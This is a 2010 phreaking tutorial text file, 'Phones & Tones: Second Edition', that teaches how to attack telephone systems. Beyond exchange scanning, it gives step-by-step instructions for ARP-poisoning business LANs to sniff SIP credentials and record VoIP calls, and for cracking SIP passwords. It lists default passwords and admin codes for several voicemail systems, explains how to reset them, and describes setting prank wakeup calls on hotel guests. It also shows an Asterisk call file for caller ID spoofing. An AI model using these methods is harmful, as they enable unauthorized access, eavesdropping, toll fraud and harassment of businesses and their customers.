Phones & Tones: Second Edition

1. | Phones & Tones: Second Edition |
2. ----------------------------------
3. | by Murder Mouse |
4.  
5.  
6. Section 1: The Introduction
7. ----------------------------
8.  
9. Greets and meets. Well it's definitely been a while since my last tutorial
10. and with a new decade upon us now is as great a time as ever for a much
11. needed update. Phreaking has definitely seen some changes since I wrote
12. the original release. Joybubbles is gone, voip is now the standard for
13. almost any PBX, and in most cities in the US payphones are just a memory.
14. In fact as I'm writing this the FCC is already debating on how to convert
15. the entire PSTN to voip. As decades come and go the landscape of telephony
16. is constantly changing, and with it so does phreaking. Whether the calls
17. are carried through tandems or routers (technically on landline it's both)
18. the drive to explore and understand this landscape will always keep
19. phreakers going. So it's in this spirit that I write this guide.
20.  
21. One thing I'd like to point out before I get started is that I have
22. decided to write this a little differently than my original release. I've
23. stripped away much of the technical details in favor of keeping the guide
24. as simple and straight forward as possible. However this means that I'm
25. writing this guide with the assumption that you the reader already have at
26. least a basic understanding of telecommunications. I've included some
27. links and suggestions around the end of this guide and I'd suggest you
28. check through them if you need to. So with all that said, lets begin.
29.  
30.  
31.  
32. Section 2: Exchange Scanning
33. -----------------------------
34.  
35. Well as before lets start this discussion off with an explanation of
36. exchange scanning. Exchange scanning for those of you who don't know is
37. simply picking up the phone and dialing down a range of phone numbers to
38. see what you come up with. This is how you will find all those interesting
39. numbers you can fuck with and share (voicemail systems, test numbers,
40. ANACs, strange recordings, etc). So how do you get started? Well an
41. exchange, also known as the NXX, are the middle three numbers in any phone
42. number (i.e 555-xxx-1337). Most people when they first really get started
43. scan their own exchange, usually starting with the low end of the exchange
44. (i.e NPA-NXX-00xx, NPA meaning the area code). So you would start off
45. dialing NPA-NXX-0000, write down what you hear, then move on to 0001,
46. 0002, and so on and so forth. If you're the paranoid type you might want
47. to randomize your call sequence in order to make it slightly less obvious
48. what you've been up to. As in go from 0000, to 0021, to 0076, to 0014, etc
49. until you've scanned the first 100 numbers on the exchange. This of course
50. is entirely up to you, and at least in the United States exchange scanning
51. is legal in most areas (I think I remember reading about a law in
52. Conneticut concerning this but I'm not really sure on that). So anyways
53. when scanning you will probably want to make a list for yourself of the
54. results for later review or to share. It's best to make some legends
55. (acronyms) for yourself in order to abbreviate some of the most common
56. finds while you're scanning. Provided below is the list I use for all of
57. mine, which is partly based on the standard proposed on binrev a couple
58. years back..
59.  
60. CC- Cannot be completed
61. CR - Cannot be reached from your calling area
62. NS - Not in Service
63. D - Disconnected
64. CB - All circuits busy
65. RO - Reorder
66. B - Busy
67. FX - Fax machine
68. R - Rings
69. HELO - Hello?
70. VM - Voicemail
71. VMS - Voicemail System
72.  
73. Of course you're free to use whatever legends you like, but just be sure
74. you leave a list of them at the top of your exchange scans if you plan on
75. sharing them with anyone. If you need some examples to go on you can check
76. out some of Information Leak's exchange scans below...
77.  
78. www.informationleak.org/viewforum.php?f=43
79.  
80. Anyways it's best to scan during different times of the day depending on
81. what kind of exchange scan you are doing. For local exchange scans or any
82. scans that involve the probability of hitting a lot of residential lines
83. it's best to scan anywhere from mid-morning to mid-afternoon if you can.
84. This is because most people will be up and out of the house (work, school,
85. whatever). Of course any time that doesn't involve interrupting peoples'
86. much needed sleep will work just fine. On the other hand if you're doing a
87. toll free scan (1-800, 866, etc) or scanning a range assigned to a
88. specific PBX (more on this later) then you'll want to scan in the middle
89. of the night (after business hours).
90.  
91. So with all that said I'll close this section as I did last time by
92. helping you identify some of the sounds you'll be coming across while
93. scanning..
94.  
95. Fax Machines - No need to tell you what a fax machine is, but you'll come
96. across many of them while scanning and being able to pick out their tones
97. can be important. Most fax machines you'll come across will have a modem
98. sound (like the sound a modem makes when using dialup), but with a
99. slightly flatter sounding series of tones. It's kind of hard to describe,
100. but once you hear it it's easy to notice. Of course some other fax
101. machines have completely different tones. Some have a low pulsing tone,
102. and some others have a much more drawn out series of tones than most.
103. You'll hear all of them as your scanning so it's a good idea to get
104. familiarized with these tones early on.
105.  
106. Milliwatt Test Numbers - These are one of the most common test numbers,
107. and you'll be painfully aware of what they are when you stumble across
108. one, literally. The tone is a very loud consistant tone.
109.  
110. ANACs - These are very common numbers to come across, but if you're not
111. paying attention to the recordings you are stumbling across you can easily
112. miss them. These are especially common during toll free scans due to how
113. many business recordings will read off the ANI (and in some extremely rare
114. cases even include the ANI II identifier, feel privileged if you manage to
115. snag a number like this). On the other hand the ANACs that line
116. technicians use are pretty easy to discern since the recording will just
117. immediately read off the ANI. All I can tell you is pay attention.
118.  
119. DISAs - These are the administrative lines for analog PBXs and needless to
120. say are a lot less common to come across than they were just a few years
121. ago. This like I said in the introduction is because most businesses,
122. departments, etc have upgraded their PBXs to voip systems. If you do come
123. across these though you will recognize them in a wide variety of ways.
124. Some of the older analog systems have a more low consistant tone upon
125. connecting, but I haven't really heard these anytime I scan. Most of the
126. analog PBXs still up and kicking will pick up with either complete silence
127. (meaning it's waiting for DTMF input), or a dial tone. Of course there are
128. some other types of systems besides DISAs that may sit and wait for DTMF,
129. but commonly the login process is still the same irregardless.
130.  
131. DATUs - These are one of the best finds you can come across, but I'm not
132. really sure how common of a find they are these days since DATUs have
133. never really been a part of the telco here. Used to before AT&T bought the
134. area out BellSouth was using VoiceSystems which functioned just like
135. DATUs, but required a specific modem in order to access the prompt
136. (otherwise it would just hang up as soon as you called it up). Either way
137. these are administrative lines used by line technicians for basic repair
138. and tests on subscriber lines within a given exchange, and you'll
139. recognize one as a half ring followed by a low tone. I'll link some
140. information on it later in the guide.
141.  
142. VMBs - Of course by VMBs I don't mean the individual mailboxes you'll come
143. across when scanning PBXs and such, but specifically the voicemail system
144. lines for logging in and checking messages and such on the mailboxes. Just
145. like ANACs to fish these out you have to really just pay attention to any
146. recordings you come across. Some voicemail systems will announce what kind
147. of system it is as soon as you connect, while others will just go straight
148. to asking for your user id. What to do from here will be discussed in a
149. later section.
150.  
151. Also once you get a handle on exchange scanning you should look into
152. unpublished exchanges. Most of these are the exchange numbers you normally
153. dial to reach common services (411, 911, 211, etc), but depending on the
154. LEC there may also be a telco exchange used just for test numbers (like
155. 959 in the AT&T areas). To get unpublished exchanges just go to nanpa.com
156. and look for Central Office Code Assignments that are close to your area
157. (remember, Utilized means used). Compare this list to the list in your
158. phone book, and any exchanges that aren't listed in the phone book besides
159. the obvious services mentioned before can be considered special interest
160. exchanges. Finally before I finish here I should mention that if
161. handscanning seems too daunting for you and you really want to go the
162. wardialer route (to each their own) and you're a Linux user then I'd
163. suggest looking into iWar. Has plenty of nifty options, including support
164. for protocols like IAX2. Check the link below for details..
165.  
166. www.softwink.com/iwar/
167.  
168.  
169.  
170. Section 3: Hacking PBXs
171. ------------------------
172.  
173. Well now that we're done with exchange scanning we can move on to PBXs.
174. How you will go about exploring, exploiting, fondling, or whatever you
175. feel like doing with a PBX varies greatly depending on the kind of PBX it
176. is, but a great place to start either way is to do a little poking around
177. on the phone. First crack open the phone book or go over to superpages.com
178. and look up any business/department/etc you have in mind to see all the
179. listed numbers for that organization. Some of the larger businesses in
180. your area may have a range of numbers reserved. If so you will see that
181. all of the listed numbers are basically the same. Say the main office line
182. is NPA-NXX-5500, their fax line is NPA-NXX-5504, and their accounting
183. department is NPA-NXX-5542. Then it's safe to assume that a great place to
184. start is to scan the NPA-NXX-55xx range. Take note of all the numbers
185. listed and start exchange scanning down the rest to see what you come
186. across. Otherwise if there isn't a range to scan try calling the main line
187. (after business hours of course) and listen through the recording.
188. Sometimes the recording will go through a list of extensions for different
189. departments that the caller might be inquiring about. Listening through
190. this gives you the opportunity to figure out the extension range, which
191. you can then scan through like you would an exchange scan. Say the main
192. office is 10, the accounting department is 15, senior manager is 22, and
193. so on and so forth then it's safe to assume that the range goes anywhere
194. in between 10-99. So just like an exchange scan you would take note of all
195. the extensions listed, and then just keep calling back and trying all the
196. extensions that weren't mentioned. Most of the interesting extensions that
197. you'll come across will be at the end of the range (50, 99, 9999, wherever
198. the extension range ends) since all the office/department lines are going
199. to be assigned at the start on up. If all your after is the voicemail
200. system (more on these later) then you can cut short how many times you
201. have to call back by scanning up in 10s. Say the main office line is 10,
202. then you can start at 20 and just keep going up until you find what you
203. were looking for. Otherwise trying them all will at the very least as
204. would an exchange scan give you a decent idea of what kind of PBX you are
205. dealing with. Say you hear a lot of Audix mailbox recordings, then you are
206. dealing with an Avaya PBX (which is a very popular voip PBX). Just at the
207. very least listen out for anything that could help you identify what
208. exactly you're up against, and use google to do a little bit of homework
209. on it. User guides, installation manuals, any of the vendor sites can give
210. you a plethora of information that you can use later on (default
211. passwords, etc).
212.  
213. So lets say for starters that you're scanning an analog PBX and happen to
214. come across a DISA line. Well from here you would try guessing the
215. passcode and seeing if you get lucky. Try combinations like 9999#, 1234#,
216. etc and if you catch a dial tone then consider yourself lucky and use it
217. however you like (dial out, fuck around with a little, whatever). Of
218. course a more likely scenerio when scanning is that you don't find a DISA
219. line, but instead cop enough recordings to figure out what kind of voip
220. PBX you're dealing with and get all the information you need on it (Avaya,
221. Shoretel, etc). Well then you'd pack up your laptop with a softphone like
222. X-Lite downloaded (in case you want to dial out), get over around the
223. business you're targeting (during business hours), and see if there are
224. any wireless access points you can use. How to crack the key if it's
225. protected is beyond the scope of this tutorial so lets just say for shits
226. and giggles that there is an AP and it's unprotected. Well a good start
227. from here would be to start scanning the network for SIP servers. The port
228. for these is 5060 on either UDP or TCP, so in nmap you would scan for
229. these with the following..
230.  
231. nmap -sU -p 5060 192.168.1.1-254
232.  
233. Another more thorough option for Windows users is to download SiVuS and
234. scan the network that way. SiVuS has an entire suite of tools that you can
235. use in order to enumerate any information you can, and attempt some common
236. hacks against the server (REGISTER attempts, all that good stuff). Link
237. provided below...
238.  
239. www.vopsecurity.org
240.  
241. Also while I'm giving program suggestions I would also recommend checking
242. out sipvicious, which is a series of python scripts that can be used for
243. scanning, enumerating, and cracking SIP proxies and servers on the
244. network.
245.  
246. http://sipvicious.org/blog/
247.  
248. So lets say of the three you decide to use SiVuS to scan for any weak
249. points in the network you will first want to see if you can find any SIP
250. servers. First go to SIP Component Discovery and in the "Target network"
251. field enter something like 192.168.1.1-254 (whatever the network range is)
252. and then click Scan. Let this play through and see if you find any SIP
253. servers. If you do now you can scan the SIP server for any common attacks.
254. Just go to the SIP Scanner tab, and click on Scanner Configuration. Enter
255. the SIP server you found before and check "Probe Targets". From here you
256. can also configure other aspects like what sort of authentication to use
257. (most SIP servers use MD5, but cleartext still isn't completely out of the
258. question), what sort of method checks to use, security checks, log file to
259. save, and other aspects of the scan. Then just click over to the Scanner
260. Control Panel tab and initiate the scan. Now what you can do from here
261. depends on what you come across while scanning the network, and what your
262. SIP server scan pulled. A great place to start if the scan didn't pull
263. anything useful in your case is to try and grab some usernames on the
264. server. To try this you have two options. You can either with SiVuS
265. manually test usernames, or use Cain & Abel to try and sniff usernames
266. over the network. To manually test possible usernames in SiVuS go to
267. Utilities/Message Generator and fill out the appropriate information. For
268. example Method to REGISTER, Called User being the user you are attempting
269. to get a response from, Domain Host being the ip or hostname of the SIP
270. server you discovered, change the To to usertotesthere
271. <sip:usertotesthere@sipserverhere.com> and From to whatever, and change
272. Subject and User Agent to make it less obvious on the network what exactly
273. you are doing. Then click start and see what sort of response you get from
274. the server. A 401 response means you have a valid username, and 403 means
275. that it's an invalid username. A good scheme to use if you are somewhat
276. familiar with the business/department you are dealing with is to try the
277. names of employees who work there. For example the first name, first
278. initial and last name, first name and last initial, etc. This is a popular
279. scheme for a lot of places so it's definitely worth a try. Even if you
280. aren't familiar with the place you can try to take a casual visit into the
281. business/department and keep a mental note of any of the employee names
282. for future reference. Of course depending on the network it can many times
283. be a pretty hefty task trying to test any possible usernames that way so
284. lets get into sniffing over the network for possible usernames. For this
285. like I said earlier we will be using Cain & Abel, which can be downloaded
286. here..
287.  
288. www.oxid.it/cain.html
289.  
290. Now what we first have to do is establish an ARP poison route on the
291. network. To do so open up Cain & Abel and go to Configure. From here
292. select your network card and click OK. From here click the + sign, and
293. this will bring up the MAC Address Scanner. "All hosts in my subnet"
294. should be active so just press OK. Now click the + sign again and you
295. should see a list of hosts on the network on the left side. Click on the
296. IP of the SIP server and select all the IPs on the right side, then just
297. click OK. Now you can sniff all the usernames that pass over the server by
298. looking through the To, From, and Contact fields on everything that passes
299. through. Now from here one way or another you should have a decent list of
300. usernames to use so now it's time to crack any of these users to get the
301. password. From here you have two routes to go with, passive and active
302. cracking. We'll first start off with active cracking. Open up SiVuS again
303. and go to Utilities/Authentication Analysis. Here you will see Realtime
304. Analysis on the left side of the window. Enter one of the users you found
305. in the Called User field, and the IP of the SIP server in Domain/Host.
306. Then enter the usernames and passwords files in and press Start. A good
307. thing to go ahead and note is that a common password scheme is for the
308. pass to be the same as the username, or the telephone/extension number of
309. the user. So incorporating these into your password list would be a good
310. idea. Of course the problem with active cracking is that most SIP servers
311. will lock you out after 3 or so failed attempts, thus bringing us to our
312. second option; passive cracking. For this lets assume that you still have
313. Cain & Abel open from enumerating the usernames. From the Sniffer tab
314. click on the Passwords tab, and scroll down till you see SIP. From here
315. you should see some captured hashes, which you can then right click on and
316. select either dictionary or brute force. If you choose dictionary crack
317. just load the dictionary file the same way you would with an active crack,
318. and then on the right side you will see some options you can choose to use
319. with your dictionary file (reverse, double, numbered, etc). Brute force is
320. pretty straight forward, but not recommended.
321.  
322. You can also if you like while messing around with Cain & Abel use it to
323. capture and listen in on conversations going over the LAN. To do this just
324. establish an ARP poison route as you did before when sniffing out
325. usernames, but instead of clicking on the SIP server just highlight all
326. the hosts on the network, and any host connected to them. Then when you
327. have the sniffer going after this just go to the VoIP tab from the Sniffer
328. tab, and let that run for a while. That is basically it, from here Cain &
329. Abel will start capturing, encoding, and recording any conversations going
330. across the LAN. There are endless other vulnerabilities you can use
331. related to the hard phones used, the software used (IAX vulns abound),
332. etc. However for the sake of sanity I'm going to cut this section here and
333. leave it to you to look into anything else you may want to try against the
334. PBX.
335.  
336.  
337.  
338. Section 4: Hacking Voicemail Systems
339. -------------------------------------
340.  
341. Well now that we're finished discussing PBXs lets move on to VMBs. In the
342. original release of Phones & Tones I basically slacked through it by
343. linking up some tutorials from oldskoolphreak. Unfortunately most of the
344. VMB hack tutorials floating around nowadays are pretty dated so I couldn't
345. really slack through this section even if I wanted to. The methods are
346. pretty much the same as ever, except that some voicemail systems popular
347. these days (Audix for example) have no system account accessable through a
348. TUI. This means for these you have to be on the LAN itself to access any
349. administrative functions.
350.  
351. Lets start with Audix. This is by far one of the most popular voicemail
352. systems, which is used on Avaya PBXs. As mentioned before the
353. administrative functions themselves are handled on a server within the
354. LAN, which is unavailable outside the LAN. However you can remotely try to
355. break into individual mailboxes. Just dial in, and as the announcement is
356. playing hit # to access the login. While default passwords are determined
357. by the administrator there are some common schemes you can try. Passes can
358. be any length between 1-15, but most will be between 4-15. Some common
359. passes to try are passes like 111111, 123456, the phone number of the
360. mailbox (or the last 5 digits), etc. Just hit # again after hitting the
361. pass attempt and if you are successful you can hit 4 to review messages
362. stored or hit 3 to record a new greeting.
363.  
364. Now lets move on to Merlin Mail. Unlike Audix Merlin does have a system
365. administrative box for you to use. In order to access this from the main
366. line hit 9997#. From here you will be prompted to enter a pass. The
367. default pass from here depends on the version being used. For version 1
368. and 2 the default pass is 1234#, and for version 3 it's 123456#. The good
369. thing about these is even if the default passes don't work you can reset
370. the system to default (if you're feeling that malicious). Just hit 2537
371. (CLER), and you should hear a "goodbye", which will then disconnect you.
372. Just call back to the system and then punch in the default pass to access
373. the system admin box. Now from here you can hit 9 to access the
374. administrative functions. In version 1 and 2 it goes straight to these
375. options upon selecting, while with version 3 it will prompt you for a
376. second login (the default pass is 654321#). From there just shift through
377. the options and take your pick.
378.  
379. Another popular voicemail system is PartnerMail VS. This one is actually
380. very insecure in my opinion and I have no clue why it's so popular on
381. business PBXs. The problem for one is that the pass limit is 4 digits.
382. That's it, 4 digits and under is all anyone has to work with. The system
383. admin box is 99, and the default pass for these is 1234. Unlike other
384. systems (Audix and CallPilot for example) the system doesn't force anyone
385. to change the default pass so there is definitely a stronger chance that
386. even the system admin account might be still set at default. Though even
387. if not you can still try other combinations (4321, 1111, 2580, etc). From
388. here you can create a mailbox for yourself on the system by hitting 4. The
389. system will read back what mailbox numbers are available, and prompt you
390. to enter one in. Just enter one in that isn't used (preferribly on the
391. higher end of the range) and hit # to confirm your choice. Of course even
392. if you can't access the admin box to create your own mailbox you can try
393. to break into any of the other mailboxes on the system. They all have the
394. same default pass, and if that doesn't work you can try the combinations
395. mentioned before or the extension/mailbox number of the user.
396.  
397. Now that we're done with that lets move on the Cisco Unity VMBs. These are
398. popular on a lot of college campuses (as are Cisco SIP hardphones, and
399. basically anything Cisco). For these as soon as you reach the main line
400. you would hit *, and enter the ID of the mailbox. This would be the phone
401. number of the user, and the pass that follows by default would be the same
402. as the ID. If this doesn't work you can try the same combinations as
403. always (1234567, 7654321, 1111111, 1235789, etc). If you manage to guess
404. the right pass from here you can hit 1 to listen to any messages, 3 1 to
405. listen to any saved messages, and 4 1 to change the VMB greeting.
406.  
407. So now that we've gone over campus VMBs lets move on to hotels. A popular
408. system that many hotels use is DuVoice. Now the beautiful thing about
409. playing around with a system like this is how integrated it is with the
410. hotel operations as you'll find out. First lets go over the voicemail
411. system itself. Now from here there are two accounts that are going to be
412. of interest to you. 0 is the operator mailbox, and 991 is the greeting
413. box. This greeting box is used for recording greetings on the system for
414. the following day. The default pass for these is * 1234. Even if the
415. default has been changed the pass should still be in the 4 digit range so
416. treat it as you would a PartnerMail VS system. However this isn't even the
417. half of this story. DuVoice also has DuVoice Hospitality. This is the
418. system used to give out temporary mailboxes for their guests to use, which
419. is integrated into an administrative TUI. To access this from the main
420. line hit **97. Now there are a few levels of access you can use, rated
421. from basic to expert. For our interests it's best to go with expert. The
422. default pass for this is 7890#. From here you have 3 options, automatic
423. wakeup call, re-record hospitality prompts, and guest room administration.
424. In case you want to be a dick and set someone up for an imprompt wakeup
425. call select 1, enter the mailbox number, enter the hour (00-23, military
426. time), enter the minute (00-59), then it'll ask you if the hour is between
427. 1-12. So then after that prompt you'll select 1 for am, or 2 for pm. Then
428. press 1 to accept, and then set the day for the wakeup call. 1 for today,
429. 2 for tomorrow, and press 3 to set the date. If you decide to spare the
430. guests you can also go in and re-record the prompts by selecting 2 from
431. the main TUI menu. From here you can press 1 to re-record the wakeup
432. message, 2 for the wakeup announcement, 3 for the manager's welcome
433. message, 4 for the text message notification, and 5 for the default
434. greeting. From any of these it should play the current message. You can
435. from here hit 1 to accept, 2 to re-record (press # when done), 3 to
436. delete, and 4 restores the original. Finally for guest room administration
437. press 3 from the main TUI. From here you have three options, 1 to check
438. in, 2 to check out, and 3 to move. From any of these it will prompt you to
439. enter the mailbox number followed by the # sign.
440.  
441. There are definitely other voicemail systems that I could cover, but I'm
442. going to cut it short here. There is Mitel, which the mailboxes have a
443. default password of 1234 (and a LAN http server for configurations,
444. http://192.168.215.1:8180 by default). CallPilot mailboxes you would treat
445. like Audix, which are both fairly secure compared to some other voicemail
446. systems. By far the most secure I think is IP Office. By default it
447. doesn't have any means of remote administration, and the configurations
448. can only be accessed via the user's extension (not exactly impossible, but
449. a lot of effort for just one VMB). With everything else you stumble across
450. just do your homework, google what you can, and see what you can find on
451. it.
452.  
453.  
454.  
455. Section 5: ANI Spoofing
456. ------------------------
457.  
458. Well as before lets move on to ANI spoofing. ANI as you should know is the
459. way in which you as the calling party is identified over the PSTN. This is
460. of course completely separate from the CPN (caller ID), which is on an
461. entirely separate channel. When ANI spoofing was first being popularized
462. by Lucky225 it was as simple as picking the right operator (one that
463. didn't forward ANI), and having them forward the call to it's destination.
464. Nowadays of course any op is going to be able to forward ANI, however
465. there are still plenty of toll free termination providers you can use.
466. However before getting into that I'll first as before go over the list of
467. ANI II assignments. These are the two digits proceeding the ANI that helps
468. identify the type of call that is being placed. Linked below is a list of
469. the assignments used..
470.  
471. http://www.nanpa.com/number_resource_info/ani_ii_assignments.html
472.  
473. I'm going to first start off with Google Voice. Google Voice of course has
474. a lot of options, and if you can cop an invite I would suggest getting an
475. account yourself. One of these features is an outgoing call feature. Now
476. while this normally will pass your CPN you can use *67 before you call up
477. your GV number in order to pull an ANI spoof. You can use this to dial any
478. toll free number, or call 800-CALL-ATT or something in order to op divert
479. to another number. Of course I'm not sure how long this will last (credits
480. to JmanA9 for bringing this up in binrev) so try not to do anything too
481. stupid with this. If however you don't have a GV account or this trick no
482. longer works by the time you read this you can try some toll free
483. termination numbers to try the same thing. Check the list below for
484. details..
485.  
486. http://www.voip-info.org/wiki/view/Toll+Free+Termination+Providers
487.  
488.  
489.  
490. Section 6: CPN Spoofing
491. ------------------------
492.  
493. So lets move on from ANI to CPN spoofing. This is of course a bit more
494. useless than ANI spoofing, and is really just something to play around
495. with for shits and giggles. It won't really keep your call anonymous
496. (since your ANI is still carried over). The first tip I really have is
497. using SOB Caller ID Generator, which can be downloaded below..
498.  
499. http://www.artofhacking.com/orange.htm
500.  
501. Now it does have instructions on the download page and in the help file,
502. but the use of this program is pretty straight forward. You can click
503. Format to select the standard you will use. Unless you are hooking this up
504. to the phone line in order to directly spoof the CPN on your own CPE (in
505. which case you would use Standard) then the Call Waiting format is fine.
506. So just punch in the name and number you wish to display, plug a pair of
507. headphones into the speaker port on your computer, call the landline you
508. want, and anytime after the person has picked up (yup, nothing to listen
509. to your CAS tones before the other party picks up) put the headphones
510. against the mouthpiece and go ahead and press the Play button to send over
511. the spoofed CPN info. Of course all of this and anything that relies on
512. tones will be completely outdated whenever the FCC successfully converts
513. the entire PSTN over to voip, but for now this works just fine in the US
514. (the tones can vary greatly in other countries). There are however plenty
515. of other ways to spoof your caller ID which are far more effective. The
516. best way to spoof caller ID is to use asterisk, which can be downloaded
517. below..
518.  
519. www.asterisk.org/downloads
520.  
521. Asterisk is an open source voip PBX that you should really get familiar
522. with. I'll include some links around the end of this guide so you can
523. install and configure your asterisk setup. For now though lets talk about
524. how to use asterisk to spoof your CPN. Lets say you have asterisk
525. installed and have setup an account with a provider. From here you will
526. need to create the call file. This is what you will use to specify who you
527. are calling, and the spoof number you are providing. Lets say for this
528. example that your number is NPA-NXX-1337, you are wanting to call
529. NPA-NXX-5148, and you want to spoof the number as NPA-NXX-6798. Just
530. create /tmp/spoof.call and insert the following...
531.  
532. Channel: IAX2/username:password@provideraddress.com/1NPANXX1337
533. Callerid: NPANXX6798
534. MaxRetries: 5
535. RetryTime: 60
536. WaitTime: 30
537. Context: spoofing
538. Extension: NPANXX5148
539. Priority: 1
540.  
541. Then login as root, start up asterisk, and run the following command..
542.  
543. cp /tmp/spoof.call /var/spool/asterisk/outgoing
544.  
545. Asterisk will automatically detect the call file and call your number,
546. then when you answer dial the number you are wanting to call using the
547. spoofed caller ID you provided. I have to warn you of course that caller
548. ID spoofing is against the TOS for most voip providers so don't try this
549. trick with providers that you are wanting to keep around. If Linux just
550. isn't your bag and you have the cash to burn then I have to at least
551. mention all the caller ID spoofing providers out there. The two main ones
552. these days is phonegangster.com, and of course spoofcard.com. Personally
553. if you have to go this route I would suggest using spoofcard.com. It has
554. an option to change your voice, though I haven't really used it before so
555. I can't tell you how well it works. There's also SpoofApp
556. (www.spoofapp.com), which if you have an iPhone handy allows you to
557. forward any outgoing calls through the spoofcard service. The choice is
558. yours, but I would really suggest to just use the asterisk technique
559. assuming you don't need much mobility in your spoofing.
560.  
561.  
562.  
563. Section 7: Suggested Links
564. ---------------------------
565.  
566. Well I was planning on continuing this guide with a section on asterisk,
567. but in retrospect there was just too much information out there to really
568. add on anything useful. So instead I will just include links on how to
569. install and configure asterisk. You should consider trying it out. Setting
570. up your own voicemail system, conference bridge, diverter, etc are just
571. one of the few things you can do with asterisk so it's definitely a huge
572. suggestion. I provided a link to download asterisk, but if you need help
573. installing and setting up asterisk try the link below...
574.  
575. www.asteriskguru.com
576.  
577. This site includes installation guides and everything else you could need
578. to help setup asterisk on your own LAN. Now that I'm done with that I
579. should suggest some links for basic information on telephony. As you might
580. have noticed I didn't spare the acronyms in this guide, and didn't even
581. bother explaining half the terminology I used in this guide. So if you
582. found yourself confused reading this guide then I'd suggest the two
583. following links..
584.  
585. www.tech-faq.com/telephone-wiring.shtml
586. http://pt.com/page/tutorials/ss7-tutorial
587.  
588. The first link would guide you through the inner workings of most of the
589. protocols and terminology I went over briefly over the course of this
590. guide, and the second link is a basic tutorial over ccss7, which is the
591. current protocol the PSTN uses (until the FCC decides to convert it all).
592. You will need to read through both in order to try understand how the
593. phone system operates and if you're interested in truly exploring this
594. sytem and understanding how it operates I'd suggest studying both. Also as
595. promised is a brief text on DATU lines in case they're present in your
596. LEC...
597.  
598. http://www.nettwerked.net/datu.txt
599.  
600. Now finally are my brief suggestions on sites to follow..
601.  
602. www.informationleak.net - As always this is my first suggestion. I'm not
603. nearly as active on IL as I used to be, but Halla has been doing a great
604. job of keeping the site alive and there is always an active community here
605. that keeps all the information (including the phreaking bit) up-to-date.
606. So keep track.
607.  
608. www.oldskoolphreak.com - This site isn't nearly as active as it used to
609. be, but there is still some decent guides on this site and it's updated
610. every now and then. Still a somewhat decent reference for some
611. information.
612.  
613. www.binrev.com - Besides IL I'd absolutely suggest this forum for
614. up-to-date phreaking information. The community has a lot of sections, but
615. the phreaking section is very active and is definitely worth a check.
616.  
617.  
618.  
619. Section 8: The Conclusion
620. --------------------------
621.  
622. Well this is by far the longest time I slacked on any tutorial I had in
623. mind. I had at least been thinking about writing this update since 2008,
624. but for one reason or another always delayed it. Some decent reasons, but
625. mostly just laziness. As before I hope that I've grabbed your interest in
626. phreaking, but I'd like you to keep in mind that there is much (and MUCH
627. and MUCH) more to phreaking than breaking the law. All the sections I
628. wrote on breaking into random systems were more or less just teasers, but
629. I hope out of this and playing around with all this you've snagged some
630. sort of appreciation for telephony and will continue from here. If this
631. guide grabbed your interest by all means learn what you can. If this is
632. really your first introduction to telephony there is a lot to be learned
633. and I hope you find it as fascinating as I do. I'm willing to help where I
634. can, but I can't help everyone. I've included some contact information
635. below if you need more help. I can't promise you any immediate help, but
636. I'll help who I have time for.
637.  
638.  
639. Murder Mouse
640. fuck copyright, 2010
641.  
642. pla229 [skat] gmail [rot] com
643.  
644. Yahoo! ID: murder_mouse
645.  
646.  
647. (Update: Op diverting through Google Voice no longer works. It was fun
648. while it last, but you can still ANI spoof through voip termination
649. numbers)